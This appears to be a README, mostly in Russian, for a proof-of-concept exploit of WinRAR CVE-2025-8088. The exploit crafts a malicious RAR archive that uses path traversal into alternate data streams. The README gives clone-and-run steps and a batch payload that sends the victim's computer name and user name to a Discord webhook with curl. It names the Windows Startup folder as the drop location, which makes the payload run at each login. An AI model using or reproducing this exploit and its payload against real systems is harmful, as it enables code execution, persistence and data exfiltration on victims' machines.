
PoC-эксплойт для уязвимости WinRAR (CVE-2025-8088), затрагивающей версии 7.12 и ниже. Этот инструмент создаёт вредоносный RAR-архив, который внедряет полезные нагрузки в альтернативные потоки данных (ADS) с использованием обхода пути (path traversal), что потенциально может привести к выполнению произвольного кода.
Эксплойт proof-of-concept для уязвимости WinRAR (CVE-2025-8088), затрагивающей версии 7.12 и ниже. Этот инструмент создаёт вредоносный RAR-архив, который внедряет полезную нагрузку в альтернативные потоки данных (ADS) с обходом пути (path traversal), что потенциально может привести к выполнению произвольного кода.
# Clone the repository
git clone https://github.com/techcorp/CVE-2025-8088-Exploit.git
cd best-CVE-2025-8088
# Install dependencies
pip install reportlab
# Run the exploit
python CVE-2025-8088.py
Измените пейлоад для вызова Discord webhook:
# Replace the PAYLOAD variable in the script:
PAYLOAD = """@echo off
curl -H "Content-Type: application/json" -X POST -d "{\"content\": \"Extracted on %COMPUTERNAME% by %USERNAME%\"}" YOUR_DISCORD_WEBHOOK_URL
pause
"""
Замените YOUR_DISCORD_WEBHOOK_URL на ваш реальный URL вебхука.
AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\